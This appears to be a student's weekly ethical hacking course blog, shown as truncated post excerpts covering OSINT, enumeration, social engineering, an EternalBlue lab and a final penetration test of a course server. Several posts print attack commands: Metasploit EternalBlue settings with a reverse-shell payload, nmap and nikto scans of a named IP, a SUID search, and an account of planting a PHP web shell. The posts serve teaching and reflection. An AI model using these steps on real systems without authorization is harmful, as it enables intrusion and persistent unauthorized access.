Ethical Hacking Weekly Blog - 2702337230

Week 13 was dedicated to presenting our final project. Each team delivered a short presentation summarizing their ethical hacking engagement, from reconnaissance to exploitation based on their submitted report. Final Thoughts & Reflection When I first enrolled in this course, I saw ethical hacking as just another requirement in my academic program, something to get through. But over the weeks, especially after the hands-on labs and final penetration test, my view changed completely. This course turned out to be one of the most engaging and eye-opening parts of my study so far. Learning how systems can be tested, broken, and hardened was fascinating. It taught me not only technical skills, but also how attackers think, and how defenders must think smarter. Now, cybersecurity is something I’m seriously considering for my future career. It’s exciting, fast-paced, and more impactful than I expected. Honestly, it made choosing a career path even harder, in a good way.

 After weeks of preparation, our team successfully gained unauthorized access to the WordPress admin panel on server1.pentest.id , marking a major milestone in our simulated black-box penetration test. Breaking In Although earlier brute-force attempts failed, we eventually discovered a password hint left carelessly somewhere on the site. Using this, we bypassed authentication and logged in as the WordPress admin. Privilege Escalation: From Admin to Root Once inside the system, our goal shifted to escalating privileges and gaining full root access . SUID Binary Enumeration We executed a command to find all files with the SUID bit set: find / -perm -4000 - type f 2>/dev/null This revealed paths to root through misconfigured binaries like /dev/shm/rootbash and /tmp/rootbash , which could be exploited to run commands with elevated privileges. Post-Exploitation: Backdoor Access Using the Theme Editor in WordPress, we inserted a PHP web shell into the functions.php f...

This week, our team made initial progress in the final penetration testing project by successfully uncovering the real IP address of the target server, server1.pentest.id , which was originally hidden behind Cloudflare .  Real IP Discovery Identified IP: 103.127.137.243 Method: We used Censys , a search engine for internet-connected assets. By digging through historical DNS records and SSL/TLS certificate data, we were able to trace the origin IP — a reminder that even reverse proxies like Cloudflare can be bypassed with the right tools and research. Scanning & Enumeration Tools Once we had the real IP, we began actively scanning the server to find potential vulnerabilities: 1. Nmap Used for port and service discovery: nmap -sV -Pn 103.127.137.243 This scan revealed multiple open services (e.g., web, FTP, SSH) that could be potential entry points. 2. Nikto Scanned the web server for outdated software and known issues: nikto -h http://103.127.137.243 3. FFUF ...

Week 10 marked the start of our final project , where we’ll apply everything we’ve learned so far in a real-world penetration testing scenario. The goal is to simulate a complete ethical hacking engagement over the course of four weeks. Project Overview Target: server1.pentest.id Start Date: May 10, 10:00 AM Challenge: The target is protected by Cloudflare , which masks its real IP address using a reverse proxy. Project Tasks Identify the real IP hidden behind Cloudflare. Exploit vulnerabilities using known or custom techniques. Gain root access through privilege escalation. Document the entire process through: A 10-minute executive presentation A detailed technical report (DOCX) Important rules: No DoS/DDoS attacks You may clear logs and plant backdoors System configurations must not be altered or patched Lecture Recap: Vulnerability Research & Exploitation In addition to launching the project, this week’s lecture revisited t...

 This week, we participated in a forum-style session that explored real-world exploitation techniques , categorized into remote execution and local privilege escalation . These attacks represent the next steps after reconnaissance and vulnerability mapping — actually compromising a system. Category 1: Remote Code Execution (RCE) Remote execution occurs when an attacker is able to run code on a system without physical access — usually by exploiting a vulnerable service over the network. EternalBlue (CVE-2017-0144) Previously discussed in Weeks 6 and 7, EternalBlue targets Microsoft’s SMBv1 protocol. It allows attackers to gain full control over a system by sending crafted network packets to port 445. Once inside, malware like WannaCry or NotPetya can be deployed to spread or destroy. Log4Shell (CVE-2021-44228) A critical zero-day in Apache Log4j , a Java-based logging library. It allows attackers to perform remote code execution by injecting malicious input (e.g., into ...

The weakest link in an organization chain are humans. Some of the most damaging and well-known cyber attacks are not caused due to weak technology or a crack in the code, instead, humans. This week, we explored the most powerful and common forms of attack: social engineering . Rather than targeting software or hardware, these attacks focus on exploiting human behavior to gain unauthorized access or information.  Social Engineering Attack Process We broke down the social engineering attack lifecycle into four main phases: Intelligence Gathering – Researching the target through social media, company websites, or public records. Identifying Vulnerabilities – Pinpointing weak spots in communication channels or personal behaviors. Planning the Attack – Choosing a method, setting a goal, and crafting the approach. Execution – Carrying out the deception, such as sending a phishing email or impersonating an employee. Common Attack Techniques We studied psychological ...

Week 7 marked a shift from theory to hands-on practice. In a controlled lab environment, we simulated a real-world cyberattack by exploiting the EternalBlue vulnerability (CVE-2017-0144) using the Metasploit Framework (msfconsole) . Lab Setup We launched Metasploit using the msfconsole command and loaded the EternalBlue exploit module: use exploit/windows/smb/ms17_010_eternalblue We configured the required parameters: RHOSTS — the target machine’s IP LHOST — our own attacker machine’s IP To confirm the target was vulnerable, we scanned it using Nmap and verified that SMB (port 445) was open. The default payload used was: set PAYLOAD windows/x64/meterpreter/reverse_tcp This payload would establish a reverse shell , giving us remote access to the target system if the exploit was successful. Finally, we executed the attack with the exploit command. On success, we demonstrated control by creating a file with our name on the victim machine — proof of successful exploitat...

Instead of a lecture this week, we participated in a forum discussion centered around EternalBlue , a critical cybersecurity vulnerability that had a massive global impact. What is EternalBlue? EternalBlue is a flaw in Microsoft’s SMBv1 (Server Message Block) protocol, officially known as CVE-2017-0144 . It allows attackers to remotely execute code on unpatched systems by exploiting a buffer overflow. Originally developed by the NSA, the exploit was leaked by a group called The Shadow Brokers in 2017. This vulnerability became infamous as the driving force behind major ransomware attacks like WannaCry and NotPetya , which infected thousands of machines worldwide. How the Exploit Works Scanning – Attackers use tools like Nmap to find systems with port 445 open and missing the MS17-010 patch . Exploitation – A specially crafted SMB packet is sent, triggering a buffer overflow and allowing the attacker to gain full control of the system. Payload Injection – Once inside,...

  This week, we moved beyond just identifying devices on a network and focused on enumeration — the process of actively extracting detailed information from systems. Enumeration is more invasive than basic scanning and reveals critical details that can be used in later stages of penetration testing. What Is Enumeration? Enumeration is about uncovering the “who” and “what” behind a system: Usernames and groups Shared folders and drives Service banners and OS versions Login history and known vulnerabilities This detailed view gives ethical hackers the insights needed to plan further testing or attacks. Focus on Windows Environments We focused especially on Microsoft-based systems , where NetBIOS over TCP/IP (NBT) can leak a surprising amount of information — especially on older systems. NetBIOS Tools Used: nbtscan – Scans networks for NetBIOS data. nbtstat – A built-in command that shows NetBIOS tables. net view – Displays shared folders or devices. ...

This week, we moved deeper into the reconnaissance phase of ethical hacking by focusing on target discovery and enumeration . Once initial information is gathered, the next step is to actively identify live systems, open ports, and services running on a target network. What is Target Discovery? Target discovery is the process of finding which systems within a network are active and reachable. It’s the first active step where tools begin interacting with the target — which also increases the chances of being detected, so stealth is key. We looked at how Kali Linux provides built-in tools to perform this task efficiently and safely. Tools and Techniques Covered We explored several core concepts and tools: OS Fingerprinting – Techniques used to determine the target machine's operating system by analyzing how it responds to certain network traffic. TCP/IP and UDP Characteristics – Understanding how these protocols behave is crucial for crafting effective scans and interpreti...

This week focused on how ethical hackers can use search engines and data harvesting tools to collect publicly available information, often called open-source intelligence (OSINT). These techniques are part of the early reconnaissance phase, where hackers gather as much intel as possible without directly interacting with the target systems. Search Engine-Based Info Gathering We learned that regular search engines like Google can be powerful tools in the hands of a skilled hacker. By using advanced search queries (often called Google Dorking ), it's possible to uncover sensitive files, exposed directories, employee details, and more, all legally and publicly available. In addition to traditional search engines, we explored information harvester engines , which are designed specifically to collect data from a wide range of public sources. Tools We Explored Several specialized tools were introduced this week: TheHarvester – Collects emails, names, subdomains, and other data from...

In the second week of ethical hacking, we explored the very beginning of the hacking process, understanding the target and gathering as much information as possible before any actual attacks or scans happen.  Target Scoping Target scoping is all about setting boundaries. Ethical hackers need to know what systems or domains they’re allowed to test and under what conditions. This ensures everything stays legal, ethical, and clearly defined before moving forward. Information Gathering (Footprinting) Once the scope is set, the next step is information gathering, often called  footprinting . This involves collecting publicly available data about a target, usually without interacting directly with its systems. It's a passive but powerful way to learn about the target's digital presence. Tools Whois, Host, Dig. Lessons learnt How to gather public documents and online data about an organization. The basics of DNS enumeration and how to use it to map out a target. How to identify possi...

Our first session introduced the foundations of ethical hacking,  the legal practice of testing systems to find and fix security weaknesses before attackers do. Unlike malicious hackers, ethical hackers operate with permission and follow strict guidelines. This process is often referred to as penetration testing (pen testing) . Penetration Testing Models We learned about three types of pen testing approaches: White Box – Full system access is provided. Black Box – No prior knowledge is given, simulating an external threat. Gray Box – Partial system knowledge is shared. These models help organizations understand their technical weaknesses and test how well their teams can respond to real threats. Client Requirements & Business Goals We also explored how pen testing must align with the client’s objectives and business needs . It's not just about finding vulnerabilities, it's about understanding: What the client wants to protect. How security impacts bus...